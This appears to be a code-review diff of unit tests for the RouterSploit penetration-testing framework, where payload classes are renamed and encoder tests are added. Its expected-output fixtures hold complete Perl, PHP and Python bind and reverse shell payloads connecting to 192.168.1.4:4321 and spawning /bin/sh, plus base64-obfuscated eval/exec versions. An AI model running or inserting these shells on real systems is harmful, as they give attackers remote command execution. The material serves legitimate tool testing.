# mipsle bind tcp payload with rport=4321 # mipsle bind tcp payload with rport=4321
...@@ -51,7 +51,7 @@ elf_mipsle_bind_tcp = ( ...@@ -51,7 +51,7 @@ elf_mipsle_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
tests/payloads/mipsle/test_reverse_tcp.py
from routersploit.modules.payloads.mipsle.reverse_tcp import Exploit from routersploit.modules.payloads.mipsle.reverse_tcp import Payload
# mipsle reverse tcp with lhost=192.168.1.4 lport=4321 # mipsle reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -46,7 +46,7 @@ elf_mipsle_reverse_tcp = ( ...@@ -46,7 +46,7 @@ elf_mipsle_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
tests/payloads/perl/test_bind_tcp.py
from routersploit.modules.payloads.perl.bind_tcp import Exploit from routersploit.modules.payloads.perl.bind_tcp import Payload
# perl bind tcp payload with rport=4321 # perl bind tcp payload with rport=4321
bind_tcp = ( bind_tcp = (
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
"4321" +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};"
)
# perl bind tcp payload with rport=4321 encoded with perl/base64
bind_tcp_encoded = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));" "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
) )
...@@ -10,7 +19,8 @@ bind_tcp = ( ...@@ -10,7 +19,8 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
assert payload.run() == bind_tcp_encoded
tests/payloads/perl/test_reverse_tcp.py
from routersploit.modules.payloads.perl.reverse_tcp import Exploit from routersploit.modules.payloads.perl.reverse_tcp import Payload
# reverse udp payload with lhost=192.168.1.4 lport=4321 # reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = ( reverse_tcp = (
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
"192.168.1.4:4321" +
"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
)
# reverse udp payload with lhost=192.168.1.4 lport=4321 encoded with perl/base64
reverse_tcp_encoded = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));" "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
) )
...@@ -10,8 +18,9 @@ reverse_tcp = ( ...@@ -10,8 +18,9 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.generate() == reverse_tcp
assert payload.run() == reverse_tcp_encoded
tests/payloads/php/test_bind_tcp.py
from routersploit.modules.payloads.php.bind_tcp import Exploit from routersploit.modules.payloads.php.bind_tcp import Payload
# php bind tcp payload with rport=4321 # php bind tcp payload with rport 4321
bind_tcp = ( bind_tcp = (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",4321);" +
"socket_listen($s,1);" +
"$cl=socket_accept($s);" +
"while(1){" +
"if(!socket_write($cl,\"$ \",2))exit;" +
"$in=socket_read($cl,100);" +
"$cmd=popen(\"$in\",\"r\");" +
"while(!feof($cmd)){" +
"$m=fgetc($cmd);" +
"socket_write($cl,$m,strlen($m));" +
"}}"
)
# php bind tcp payload with rport=4321 encoded with php/base64
bind_tcp_encoded = (
"eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));" "eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));"
) )
...@@ -10,7 +26,8 @@ bind_tcp = ( ...@@ -10,7 +26,8 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
assert payload.run() == bind_tcp_encoded
tests/payloads/php/test_reverse_tcp.py
from routersploit.modules.payloads.php.reverse_tcp import Exploit from routersploit.modules.payloads.php.reverse_tcp import Payload
# php reverse tcp payload with lhost=192.168.1.4 lport=4321 # php reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = ( reverse_tcp = (
"$s=fsockopen(\"tcp://192.168.1.4\",4321);" +
"while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}"
)
# php reverse tcp payload with lhost=192.168.1.4 lport=4321 encoded with php/base64
reverse_tcp_encoded = (
"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));" "eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));"
) )
...@@ -10,8 +17,9 @@ reverse_tcp = ( ...@@ -10,8 +17,9 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.generate() == reverse_tcp
assert payload.run() == reverse_tcp_encoded
tests/payloads/python/test_bind_tcp.py
from routersploit.modules.payloads.python.bind_tcp import Exploit from routersploit.modules.payloads.python.bind_tcp import Payload
# python bind tcp payload with rport=4321 # python bind tcp payload with rport=4321
bind_tcp = ( bind_tcp = (
"import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',4321))\n" +
"so.listen(1)\n" +
"so,addr=so.accept()\n" +
"x=False\n" +
"while not x:\n" +
"\tdata=so.recv(1024)\n" +
"\tstdin,stdout,stderr,=os.popen3(data)\n" +
"\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n"
)
# python bind tcp payload with rport=4321 encoded with python/base64
bind_tcp_encoded = (
"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))" "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
) )
...@@ -10,7 +25,8 @@ bind_tcp = ( ...@@ -10,7 +25,8 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
assert payload.run() == bind_tcp_encoded
tests/payloads/python/test_bind_udp.py
from routersploit.modules.payloads.python.bind_udp import Exploit from routersploit.modules.payloads.python.bind_udp import Payload
# python bind udp payload with rport=4321 # python bind udp payload with rport=4321
bind_udp = ( bind_udp = (
"from subprocess import Popen,PIPE\n" +
"from socket import socket, AF_INET, SOCK_DGRAM\n" +
"s=socket(AF_INET,SOCK_DGRAM)\n" +
"s.bind(('0.0.0.0',4321))\n" +
"while 1:\n"
"\tdata,addr=s.recvfrom(1024)\n" +
"\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
"\ts.sendto(''.join([out[0],out[1]]),addr)\n"
)
# python bind udp payload with rport=4321 encoded with python/base64
bind_udp_encoded = (
"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))" "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
) )
...@@ -10,7 +22,8 @@ bind_udp = ( ...@@ -10,7 +22,8 @@ bind_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_udp assert payload.generate() == bind_udp
assert payload.run() == bind_udp_encoded
tests/payloads/python/test_reverse_tcp.py
from routersploit.modules.payloads.python.reverse_tcp import Exploit from routersploit.modules.payloads.python.reverse_tcp import Payload
# python reverse tcp payload with lhost=192.168.1.4 lport=4321 # python reverse tcp payload with lhost=192.168.1.4 lport 4321
reverse_tcp = ( reverse_tcp = (
"import socket,subprocess,os\n" +
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"s.connect(('192.168.1.4',4321))\n" +
"os.dup2(s.fileno(),0)\n" +
"os.dup2(s.fileno(),1)\n" +
"os.dup2(s.fileno(),2)\n" +
"p=subprocess.call([\"/bin/sh\",\"-i\"])"
)
# python reverse tcp payload with lhost=192.168.1.4 lport=4321 encoded with python/base64
reverse_tcp_encoded = (
"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))" "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))"
) )
...@@ -10,8 +21,9 @@ reverse_tcp = ( ...@@ -10,8 +21,9 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.generate() == reverse_tcp
assert payload.run() == reverse_tcp_encoded
tests/payloads/python/test_reverse_udp.py
from routersploit.modules.payloads.python.reverse_udp import Exploit from routersploit.modules.payloads.python.reverse_udp import Payload
# python reverse udp payload with lhost=192.168.1.4 lport=4321 # python reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_udp = ( reverse_udp = (
"import os\n" +
"import pty\n" +
"import socket\n" +
"s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" +
"s.connect(('192.168.1.4',4321))\n" +
"os.dup2(s.fileno(), 0)\n" +
"os.dup2(s.fileno(), 1)\n" +
"os.dup2(s.fileno(), 2)\n" +
"pty.spawn('/bin/sh');\n" +
"s.close()\n"
)
# python reverse udp payload with lhost=192.168.1.4 lport=4321 encoded with python/base64
reverse_udp_encoded = (
"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))" "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
) )
...@@ -10,8 +24,9 @@ reverse_udp = ( ...@@ -10,8 +24,9 @@ reverse_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_udp assert payload.generate() == reverse_udp
assert payload.run() == reverse_udp_encoded
tests/payloads/x64/test_bind_tcp.py
from routersploit.modules.payloads.x64.bind_tcp import Exploit from routersploit.modules.payloads.x64.bind_tcp import Payload
# bind tcp payload with rport=4321 # bind tcp payload with rport=4321
...@@ -33,7 +33,7 @@ elf_x64_bind_tcp = ( ...@@ -33,7 +33,7 @@ elf_x64_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
tests/payloads/x64/test_reverse_tcp.py
from routersploit.modules.payloads.x64.reverse_tcp import Exploit from routersploit.modules.payloads.x64.reverse_tcp import Payload
# reverse tcp with lhost=192.168.1.4 lport=4321 # reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -31,7 +31,7 @@ elf_x64_reverse_tcp = ( ...@@ -31,7 +31,7 @@ elf_x64_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
tests/payloads/x86/test_bind_tcp.py
from routersploit.modules.payloads.x86.bind_tcp import Exploit from routersploit.modules.payloads.x86.bind_tcp import Payload
# bind tcp payload with rport=4321 # bind tcp payload with rport=4321
...@@ -30,7 +30,7 @@ elf_x86_reverse_tcp = ( ...@@ -30,7 +30,7 @@ elf_x86_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
tests/payloads/x86/test_reverse_tcp.py
from routersploit.modules.payloads.x86.reverse_tcp import Exploit from routersploit.modules.payloads.x86.reverse_tcp import Payload
# reverse tcp with lhost=192.168.1.4 lport=4321 # reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -29,7 +29,7 @@ elf_x86_reverse_tcp = ( ...@@ -29,7 +29,7 @@ elf_x86_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
tests/test_module_info.py
...@@ -64,7 +64,23 @@ def test_scanner_info(scanner): ...@@ -64,7 +64,23 @@ def test_scanner_info(scanner):
@pytest.mark.parametrize("payload", iter_modules("./routersploit/modules/payloads")) @pytest.mark.parametrize("payload", iter_modules("./routersploit/modules/payloads"))
def test_payload_info(payload): def test_payload_info(payload):
info = payload._Exploit__info__ info = payload._Payload__info__
assert isinstance(info, dict)
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
assert isinstance(info["authors"], tuple)
@pytest.mark.parametrize("encoder", iter_modules("./routersploit/modules/encoders"))
def test_encoder_info(encoder):
info = encoder._Encoder__info__
assert isinstance(info, dict) assert isinstance(info, dict)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment